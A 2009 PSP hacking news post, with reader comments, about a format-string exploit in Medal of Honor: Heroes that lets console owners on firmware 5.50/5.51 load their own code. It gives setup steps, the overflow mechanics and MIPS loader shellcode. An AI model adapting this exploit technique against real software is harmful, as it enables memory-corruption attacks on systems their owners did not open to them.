Firmware 5.50 and 5.51 owners – don’t give up hope just yet, as a working exploit has been found in Medal of Honor: Heroes. (Just watch the youtube video above) This surfaced on the dcemu forums a few days ago. But like the other exploits this wasn’t thought to be of any use to us all. But unlike the others this one does work.
Thanks to kgsws˜™ for getting this far with a working exploit for 5.50 & 5.51 users.
Notes:
More info: Do not change room name to “lb” manually, use nitePR cheat to do it.
tested on: (and works)
- PSP-1000 (M33)
- PSP-3000 (CFW enabler)EDIT:
It was tested on PSP-1000 with official firmware 5.51, it works.
It should work on PSP-3000 too.
*Sit back and watch the Medal of Honor: Heroes price soar on Ebay and Amazon….
Source: Dcemu
MOHH (1) exploit by kgsws
What you need:
- CFW PSP (can be far away, this exploit works over net)
- NON-CFW PSP
- WiFi net (both PSP)
for CFW-PSP:
- nitePR plugin
for NON-CFW PSP:
- MOHH (1) UMDHow to do it (CFW PSP):
- install nitePR
- copy ULUS-10141.txt to nitePR folder
- enable nitePR plugin
- run game, join infrastructure
- switch to “create server” section
- activate cheat “Room name run:ms0:/hx”
- start server
- before joining as player activate cheat “Player name run:ms0:/hx”
- wait for second player
- endHow to do it (NON-CFW PSP):
- copy file “hx” to memory stick root (you can copy entire ms0 folder)
- run MOHH (1)
- join infrastructure
- wait until CFW PSP create server
- join game called “lb”
- find first player
- aim at first player
- that should be allFor now it is untested on NON-CFW PSP, try it if you can …
Some info:
Player name is vulerable to format-string exploit.
You can’t have player name too long, format-string exploit is only way.
If you put exactly 880 characters in name (by format-string), next 4 characters will overwrite $ra register.
OK, 880 characters only for on-aim exploit.
Exploit code is stored in room name, new $ra points here.
Exploit code just load ms0:/hx.
Room name is also limited in size, you can put there only 35 characters (no ‘\0′).
I used old game registers to get loader working.
This trick is limited, it loads only 62064b to address 0×08E3227C, but it executes it from 0×08E3228C, that means first 4 instructions won’t be executed.
File ms0:/hx must be big, becouse of PSP’s cache, so when you compile your own, append some chars at end.
Same bug might be in MOHH 2, but not tested.Room name code (addresses on execution):
#addr 0×08E32270
addi $a0, $a0, 0×626C # *path
#addr 0×08E32274
jal 0×08C92BE4
#addr 0×08E32278
li $a1, 0×0801 # flags (PSP_O_RDONLY | PSP_O_EXCL)
#addr 0×08E3227C
ori $a1, $ra, 0×227C
#addr 0×08E32280
andi $a2, $sp, 0xFFFF
#addr 0×08E32284
jal 0×08C92B94
#addr 0×08E32288
andi $a0, $v0, 0xFFFF
#addr 0×08E3228C
# ms0:
#addr 0×08E32290
# /hxRegisters on crash (new $ra):
zr:0×00000000 at:0×08C3BB58 v0:0×12000000 v1:0×08D10000
a0:0×08E2C020 a1:0×00000000 a2:0×08EC5BB0 a3:0×00003670
t0:0xD6000000 t1:0×47000000 t2:0×0046FFFE t3:0×08EC2540
t4:0×493F4000 t5:0×4A000000 t6:0×4B000000 t7:0×08D10000
s0:0×20202020 s1:0×20202020 s2:0×20202020 s3:0×46464646
s4:0×30464646 s5:0×08D923C0 s6:0×08D906A0 s7:0×00000002
t8:0×08D0BB80 t9:0×08D0BB80 k0:0×09FFFB00 k1:0×00000000
gp:0×08D4B440 sp:0×09FFF270 fp:0×00010000 ra:0×08E32270
Similar Posts
- Savegame Exploit found in PSP Firmware 5.50?
- PSP Go Hack isn’t fake. MaGiXieN tests FreePlay save game exploit
- LCS Cheat Device for Custom Firmware 5.50 GEN-B
- PSP Firmware 5.55 Vulnerable to MOHH Exploit
- PSP CheatUp v0.20 – Automatically download cheat codes
- PSP CheatUp v0.26 – Automatically download cheat codes
Digg it
Stumble
Del.ico.us
Reddit
Newsvine
Leave a comment
Add your link!
July 9, 2009 at 8:21 am
Hmm lets see where this exploit takes us
July 10, 2009 at 6:08 pm
i dont know BUT WHAT HAPPENS WHEN YOUR PSP IS BRICKED? AND HOW DO YOU BRICK YOUR PSP?
IVE HEARD MANY PEOPLE TALKING ABOUT THEIR BRICKD PSPs
July 17, 2009 at 8:36 pm
This exploit is good. I respect Kgsws. But what we are really waiting for, is that we need this exploit to have some chickHen R2 running and ect. Or therewise, this exploit is just like a Hello World exploit.
July 9, 2009 at 8:40 am
lots of exploits are taking place these days.
July 9, 2009 at 8:48 am
3rd..yay..actually im not getting excited about this exploit its the real deal that matters to me..
July 9, 2009 at 9:05 am
Well apparently this one is the real deal..
July 9, 2009 at 9:27 am
I’ve been waiting for so long. The future looks bright now.
July 9, 2009 at 10:30 am
It Works It Really WORKS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
July 10, 2009 at 10:16 pm
Have you done it? I have Medal of Honor Heroes 1 and a psp 3000 with 5.50 can you help me do this exploit my username is dtd747 any one with this game and CFW add me as a friend
July 9, 2009 at 11:45 am
UPDATE:
Medal of Honor Heroes second exploit
There is new version of old exploit …
What’s new?
Now you don’t need WiFi connection and CFW PSP.
It also take much less time to run.
Download here: http://zdoom.ic.cz/psp/moh-exploit-v2.zip
… and read info.txt …
July 9, 2009 at 11:46 am
Medal of Honor Heroes second exploit
There is new version of old exploit …
What’s new?
Now you don’t need WiFi connection and CFW PSP.
It also take much less time to run.
Download here: http://zdoom.ic.cz/psp/moh-exploit-v2.zip
… and read info.txt …
July 9, 2009 at 12:41 pm
AWESOME good luck to those unlucky people who updated to 5.50 and 5.51 then heard about 5.03 and just shat themselves
July 9, 2009 at 1:13 pm
this site is a bit slow….this was up at Dark_Alex forums few days ago….
July 9, 2009 at 1:17 pm
Well we didn’t post it till it was proven to work, that’s why.
July 9, 2009 at 4:05 pm
oh thats why. because other website been had these.
July 9, 2009 at 1:14 pm
damnit i got every thing except the MOHH
July 9, 2009 at 1:37 pm
there is second exploit it works with adhock and without cfw psp
July 9, 2009 at 2:54 pm
what!!!!! Show ME NOWWWWWW
Pleaseeeee
July 9, 2009 at 3:35 pm
for some reason I’m not allowed to post links here-whenever I try it says:
Your comment is awaiting moderation.
and it never been posted so try using google-in the english part of the forum of DAX is link too
July 9, 2009 at 2:10 pm
don’t got the MOHH either yo. . .tsk
July 9, 2009 at 2:56 pm
sad i dont have a second psp or a friend who has one with cfw
very sad
July 9, 2009 at 2:57 pm
Still though, Bright Future!!!
HAPPY AND SAD
July 9, 2009 at 3:37 pm
there is adhock version that doesn’t requires CFW PSP
July 9, 2009 at 3:36 pm
looks like not all hope is lost. good luck to all who try, i might even set a server up just for I have MOHH and cfw : )
July 9, 2009 at 3:49 pm
i posted the second exploit in the forum. . .
check it if your interested. . .
July 9, 2009 at 3:58 pm
I have 2 questions”
1.) Is this a HOMEBREW or a CFW?
2.) If its a HOMEBREW, can we use CFW ENABLER?
July 9, 2009 at 4:08 pm
how do you get another CFW player through online?
July 9, 2009 at 4:18 pm
you the second exploit -it doesn’t require the other psp
July 9, 2009 at 5:06 pm
what can this exploit do?
July 9, 2009 at 5:15 pm
for now almost nothing but the HEN for 5.03 can be compiled so that it works with this and 5.50 users will be able to use homebrews and after that when new cfwe be done even iso games
July 9, 2009 at 6:13 pm
AHHHHHHHHHHHHH I HAVE MEDAL OF HONOR HEROES 2!!!!!
July 9, 2009 at 6:45 pm
It was said that it’s quite possible to have similar overflow in MOH 2 but I assume that should be made another save game for it
July 9, 2009 at 6:23 pm
http://pspslimhacks.com/forum/psp-developer-board/second-mohh-exploit/
I dont even know if this works so emmmm…….
Why dont they make an Exploit, that doesnt require a silly game.
August 12, 2009 at 9:42 am
its hard to find one even with a game, how do you suspect people to make an exploit without a game so easily?
this is great to have one at all
July 9, 2009 at 8:06 pm
plugins manager brick my psp 3004
plz help me can i unbrick my psp 3004
July 9, 2009 at 8:24 pm
can this work on psp 200 v3
July 9, 2009 at 9:15 pm
i got psp 2000 american and lego batman wen i pley it then turn it off the screen tuns dark and the power light keeps flashing for about 15 seconds if i press and hold buttons it flashes longer im on firmware 4.05 plz tel me thats normal
July 9, 2009 at 9:17 pm
plz tell me
July 9, 2009 at 10:25 pm
firmware is damaged a bit i think. . .
guess its normal though. . .
July 9, 2009 at 10:39 pm
i dont now cuz updated it from the game update to play hmm
July 9, 2009 at 11:48 pm
Bad things always happen to me. The day my psp is stolen, a working exploit is found for it. But the real funny thing is that i had Medal of Honor in my psp at the time. lmao, I have to laugh and then sigh.
July 10, 2009 at 2:25 am
lol u and me both man mine was stolen just as CFE came out for 3k lol but i got mine back thru the coppers
July 10, 2009 at 2:42 am
Seems like there are a lot of PSP theives on the prowl. Better keep mine locked up =D
July 10, 2009 at 12:06 am
I don’t get it. ( Sorry for sounding stupid, but ) What’s this exploit suppose to do, exactly? Does it run 5.51 CFW or something? Isn’t OFW 5.51 hackable through normal means though, like through the use of a Pandora’s Battery and Magi Memory Stick combo?
July 10, 2009 at 12:08 am
Oh yeah, and if this IS the only way to run 5.51 CFW, can the exploit be done with a Medal of Honor Heroes ISO?
July 10, 2009 at 12:29 am
do ure research before posting comments………..u cant use pandora battery on these new psp’s (psp 2K with ta-088v3 mobo and psp 3K)…..which is why people are trying to find exploits……there is no 5.51cfw only 5.00m33-6 for pandorable psp’s and 5.03m33-6/MHU for psp’s with cfe
July 10, 2009 at 6:22 am
So are you saying Pandora’s Battery is only good up to 5.00 CFW?? BTW, I couldn’t care less if you can Pandora PSPs ta-088v3 or later, I already fucking knew that.
July 10, 2009 at 6:23 am
can’t*
July 13, 2009 at 6:51 am
I am saying that pandora battery only works on psp phat and psp 2000 slim that dont have the ta-088v3 mobo (actually there is also ta-090v2 mobo in slims, which is not pandorable but through exploits it has permanent cfw)…….btw u CANNOT use pandora on psp’s ta-088v3
July 10, 2009 at 2:31 am
lolz i’m not surprised that games so messed up in the first place
July 10, 2009 at 3:01 am
ITS JUST AND EXPLOIT, I TAUGHT THAT MY PSP 3K V5.5 WAS GONNA BE HACKED, THE GOOD NEW IS THAT I HAVE TWO PSPs 3K THE BAD NEWS IS THAT ONE IS CFW AND ONE IS OFW
July 10, 2009 at 8:06 am
your good to go if you have the game. the one that doesnt have cfw can get it now
July 10, 2009 at 3:45 am
What do you do when you are on the kgsws menu thing?
July 10, 2009 at 6:28 am
My PSP is bricked. So I really don’t care much about it. Sure. If 5.50 and 5.51 get hacked and the mysterious 5.55 comes into the US and gets hacked, Sure I will buy a PSP 3000 and wait ’til the rumored PSP Go comes out.
July 10, 2009 at 3:56 pm
It’s not rumored. It’s coming out in October.
July 10, 2009 at 9:29 am
can i unbrick my psp 3004
plz reply me!!!
July 10, 2009 at 9:19 pm
go to forums and look for topic about unbricking psp. its a sticky topic.
July 10, 2009 at 4:45 pm
so i got to buy this game?
July 11, 2009 at 3:07 am
this is not really a usable hack yet, but it is promising. google pspgen (translate as the site is in french), or try quickjumpdotnet there is a newer version that does not need two psps, but still needs medal of honor us version. problem is that this cant actually do anything yet. it is just an opening for something to happen, maybe.
if you have firmware 5.03 stay there. if you have 5.50 or 5.51, for gods sake, do not upgrade. and if you do dont ever come back to these forums and ask, will this hack work on ofw 5.52 0r whatever is next because sony always closes holes with every firmware update.
if im not mistaken the chickhen came about through research into the gripshift hole, so just wait, maybe this will be something someday. but i remember when that exploit was found everyone was advised not to update past ofw 5.02, but apperently alot of you did. dont do it again as these holes are harder to find everytime sony releases a new firmware.
July 20, 2009 at 12:26 am
kay well… not everyone knew of the advice.. so you can’t blame them for updating to 5.50 or 5.51.
and another thing… for the people who make cfw and everything.. they should focus more on cfw for 5.50 or 5.51.. so that people like me, would stop complainiing..:’(
July 11, 2009 at 5:37 pm
I hope they’re gonna work fast on making this hack work on 5.50 without the game.
I just bought my PSP 3 days ago, so I never really had a choice as whether to upgrade the firmware or not, seeing how it came with 5.50 already installed.
July 11, 2009 at 10:43 pm
I think the answer to the blocking of psn may be DAVEE!!!!. If he could put iso/cso support in chickhen, sony hasn’t blocked that. If he could release R3, that may be the answer……
July 12, 2009 at 12:24 am
PSN works on 5.50genb, davee didnt put iso support in chickhen, and sony immediately patched the chickhen tiff exploit, but other than that great post…
July 13, 2009 at 6:51 pm
they didnt “immediatly” patch it
for some reason, sony waited 3 years after the very first tiff exploit
July 12, 2009 at 12:27 am
now… when the exploit has a working hen… I’ll get the game… my 3K is hungry for Gex and Croc!
July 12, 2009 at 12:57 am
They might start patching medal of honor soon!
July 12, 2009 at 2:52 am
they can’t patch a game you idiot. . .
they’ll patch the next firmware. . .
July 12, 2009 at 3:29 am
They can’t patch the game but they might patch the online multiplayer server and we know it’s possible..
July 12, 2009 at 9:28 am
yep but the second exploit works with adhock-how do they patch this
:D:D
July 12, 2009 at 3:44 am
crap… DAVEE HELP ME!!!!!!!!!!!!
July 12, 2009 at 7:16 am
even if they patch the server(which i doubt they could since its the game were using). . .
theres an offline method. . .
i posted it in the forum the day this was released. . .
July 12, 2009 at 4:36 pm
well… I’ll go to gamestop and get it when there’s a hen…
July 12, 2009 at 8:59 pm
sweet this game was the first game i ever purchased when i bought my psp slim almost two years ago thankfully it was hackable and i have the hell outta this game. I love medal of honor heroes!
July 13, 2009 at 4:26 pm
when in the menu. . .
what do i do next?
July 13, 2009 at 5:47 pm
it is just an Exploit, Idiot.
July 13, 2009 at 11:05 pm
lol flamez i guess that makes u and errol even, idiot
July 14, 2009 at 9:39 am
this post has the most replies in the shortest time of any topic
about 30 replies in 4 hrs
July 15, 2009 at 7:31 pm
can this exploit work for medal of honor heroes 2??????
July 18, 2009 at 4:42 am
i think so. . .not sure as yet though
July 18, 2009 at 6:21 pm
in what folder i have to put the exploit??????